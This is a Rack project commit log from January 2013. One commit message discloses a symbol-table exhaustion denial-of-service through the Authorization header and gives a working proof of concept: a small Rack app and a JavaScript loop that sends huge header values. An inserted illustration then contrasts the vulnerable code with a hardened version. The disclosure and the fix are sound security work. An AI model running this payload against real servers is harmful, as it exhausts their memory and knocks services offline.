Commits on Jan 22, 2013
  1. James Tucker
  2. James Tucker

    Update README for 1.5.0 release

    raggi authored
  3. James Tucker

    Switch to RFC 2822 expires

    raggi authored
Commits on Jan 21, 2013
  1. James Tucker

    Fix a long standing misnomer for date formats

    raggi authored
    References #414
  2. James Tucker
  3. James Tucker
  4. James Tucker

    Merge pull request #496 from homakov/patch-3

    raggi authored
    Remove never called string
Commits on Jan 14, 2013
  1. Egor Homakov

    Remove never called string

    homakov authored
    Previous check `p.empty?` makes sure that p contains at least 1 symbol.
    After `.split('=', 2)` k or v or both will turn into some string which means `k || v` will always return true and `next` will never be called.
Commits on Jan 13, 2013
  1. James Tucker

    Update to 1.5.0.beta.2

    raggi authored
  2. James Tucker

    Update README security notes

    raggi authored
  3. James Tucker
  4. James Tucker

    Rack::Auth::AbstractRequest#scheme returns strings

    raggi authored
     * This is a breaking API change, but doesn't appear to be used in public
  5. James Tucker

    Squash test warnings

    raggi authored
  6. James Tucker
  7. James Tucker

    Squash warnings in spec_auth

    raggi authored
  8. James Tucker

    Reimplement auth scheme fix

    raggi authored
     * Add Rack::Auth.add_scheme to enable folks to fix anything that breaks
     * Add common auth schemes, MS ones, AWS ones, etc are missing, as unlikely
     * Checked Rails - they don't use our authorization code
     * Checked Warden - uses rails
     * Checked Omniauth - uses rails
     * Checked doorkeeper - uses rails
     * Checked rack-authentication - does its own thing
     * Checked warden-oauth - doesn't do headers
     * Checked devise - uses rails
     * Checked oauth2-rack - header creation only
     * Checked rack-oauth2-server - does its own thing
     * Probably missed a bunch, but that'll have to do
  9. James Tucker

    Revert "Merge pull request #494 from homakov/patch-2"

    raggi authored
    This reverts commit 9b76e4f, reversing
    changes made to bf32f4b.
  10. Konstantin Haase

    Merge pull request #494 from homakov/patch-2

    rkh authored
    Remove .to_sym in Authorization scheme
  11. Egor Homakov

    Remove .to_sym in Authorization scheme

    homakov authored
    Hello, `.to_sym` should never be applied to user input. Thus I recommend you change the `scheme` method:
    ```ruby
      def scheme
        @scheme ||= parts.first.downcase.to_sym
      end
    ```
    While we can't send an enormous amount of `Authorization` headers, we can make them as long as possible.
    This is a PoC. App:
    ```ruby
    # config.ru
    require 'rack'
    run lambda{|e|
        auth = Rack::Auth::Basic::Request.new(e)
        puts auth.basic? if auth.provided?
        puts Symbol.all_symbols.size
        [200, {'Content-Type'=>'text/html'},['IM FINE']]
    }
    ```
    Simple JavaScript to DoS it:
    ```javascript
    var base = ["aa", "ab", "ac", "ad", "ae", "af", "ag", "ah", "ai", "aj", "ak", "al", "am", "an", "ao", "ap", "aq", "ar", "as", "at", "au", "av", "aw", "ax", "ay", "az", "ba", "bb", "bc", "bd", "be", "bf", "bg", "bh", "bi", "bj", "bk", "bl", "bm", "bn", "bo", "bp", "bq", "br", "bs", "bt", "bu", "bv", "bw", "bx", "by", "bz", "ca", "cb", "cc", "cd", "ce", "cf", "cg", "ch", "ci", "cj", "ck", "cl", "cm", "cn", "co", "cp", "cq", "cr", "cs", "ct", "cu", "cv", "cw", "cx", "cy", "cz", "da", "db", "dc", "dd", "de", "df", "dg", "dh", "di", "dj", "dk", "dl", "dm", "dn", "do", "dp", "dq", "dr", "ds", "dt", "du", "dv", "dw", "dx", "dy", "dz", "ea", "eb", "ec", "ed", "ee", "ef", "eg", "eh", "ei", "ej", "ek", "el", "em", "en", "eo", "ep", "eq", "er", "es", "et", "eu", "ev", "ew", "ex", "ey", "ez", "fa", "fb", "fc", "fd", "fe", "ff", "fg", "fh", "fi", "fj", "fk", "fl", "fm", "fn", "fo", "fp", "fq", "fr", "fs", "ft", "fu", "fv", "fw", "fx", "fy", "fz", "ga", "gb", "gc", "gd", "ge", "gf", "gg", "gh", "gi", "gj", "gk", "gl", "gm", "gn", "go", "gp", "gq", "gr", "gs", "gt", "gu", "gv", "gw", "gx", "gy", "gz", "ha", "hb", "hc", "hd", "he", "hf", "hg", "hh", "hi", "hj", "hk", "hl", "hm", "hn", "ho", "hp", "hq", "hr", "hs", "ht", "hu", "hv", "hw", "hx", "hy", "hz", "ia", "ib", "ic", "id", "ie", "if", "ig", "ih", "ii", "ij", "ik", "il", "im", "in", "io", "ip", "iq", "ir", "is", "it", "iu", "iv", "iw", "ix", "iy", "iz", "ja", "jb", "jc", "jd", "je", "jf", "jg", "jh", "ji", "jj"];
    var total_sent = 0
    for(var num in base){
    	var x = new XMLHttpRequest;
    	x.open('GET','/'); 
    	str = '';
    	for(i=0;i<2000000;i++){
    	    str+='Ё'+base[num]+i;
    	}
    	x.setRequestHeader('Authorization',str+' lol')
    	x.send();
    	console.log('Total sent: ',total_sent+=str.length);
    }
    ```
    When we run the JS, every request carries 18888890 letters in a symbol. This 'data' will never be garbage collected.
    Should it be fixed?
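As an added illustration (not Rack's own code) of the fix direction described in the "Reimplement auth scheme fix" commit and of the problem in the message above: the vulnerable shape interns whatever scheme string the client sends, while the hardened version only ever looks user input up as a string against a registry of schemes that were interned once by trusted code. The `AuthSchemes` module name, its default scheme list and the `vulnerable_scheme` helper are assumptions for this example.

```ruby
# Vulnerable shape from the commit message: every distinct scheme string the
# client sends becomes a new Symbol (on Ruby < 2.2 such symbols are never
# garbage collected, so the symbol table grows without bound).
def vulnerable_scheme(authorization)
  authorization.to_s.split(' ', 2).first.to_s.downcase.to_sym
end

# Hardened replacement: a fixed registry of known schemes. User input is only
# used as a String hash key; unknown schemes yield nil and are never interned.
module AuthSchemes
  KNOWN = {}

  # Called from trusted application code (mirrors the idea of
  # Rack::Auth.add_scheme); this is the only place a Symbol is created.
  def self.add_scheme(name)
    key = name.to_s.downcase
    KNOWN[key] = key.to_sym
  end

  # Assumed default set for the example.
  %w[basic digest bearer].each { |s| add_scheme(s) }

  # Parse "<scheme> <credentials>" and return the registered Symbol, or nil.
  def self.scheme(authorization)
    return nil if authorization.nil? || authorization.empty?
    raw = authorization.split(' ', 2).first.to_s.downcase
    KNOWN[raw]
  end

  # Convenience for a Rack env: reads the header the way Rack exposes it.
  def self.scheme_from_env(env)
    scheme(env['HTTP_AUTHORIZATION'])
  end
end
```

With `vulnerable_scheme`, an attacker-chosen header such as `Zzz0001 lol` produces a brand-new Symbol; with `AuthSchemes.scheme` the same header returns `nil` and allocates only short-lived Strings.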
Commits on Jan 11, 2013
  1. James Tucker

    Merge branch 'hijack'

    raggi authored
    * hijack:
      Hijack SPEC changes after review discussion
      Add straw man for the after-headers hijack
      Straw man for rack.hijack*, connection hijacking!
  2. James Tucker
  3. James Tucker

    Add q-value helpers for Accept headers, etc.

    raggi authored
     * Supersedes and closes #443
  4. James Tucker
  5. James Tucker

    Minor code review comments closing #451

    raggi authored
     * Adds documentation
     * find is preferred over detect
     * Superseded body objects should be closed
  6. James Tucker

    Revert "Set TMPDIR to fix Dir.mktmpdir under jRuby"

    raggi authored
    This reverts commit 3b24fa9.
  7. James Tucker

    Merge branch 'sendfile_path_mapping' of git://github.com/Casecommons/…

    raggi authored
    …rack into sendfile
    
    * 'sendfile_path_mapping' of git://github.com/Casecommons/rack:
      Set TMPDIR to fix Dir.mktmpdir under jRuby
      Additional Ruby 1.8 compatibility
      Make spec_sendfile work with Ruby < 1.9
      Initialize Rack::Sendfile with accel mappings
  8. James Tucker

    Enable unix sockets with paths as trusted proxies

    raggi authored
     * Supersedes and closes #488
  9. James Tucker

    Merge pull request #491 from spastorino/allow_build_different_session…

    raggi authored
    …_object
    
    Allow subclasses build a different Session Object
  10. Santiago Pastorino
  11. James Tucker

    Merge pull request #490 from slivu/master

    raggi authored
    Added Reel Web Server and Espresso Framework to supported software list
  12. James Tucker

    Merge pull request #489 from spastorino/abstract_id_tiny_patches

    raggi authored
    Abstract id tiny patches
Commits on Jan 10, 2013
  1. Update README.rdoc

    slivu authored
  2. Santiago Pastorino
  3. Santiago Pastorino
  4. Santiago Pastorino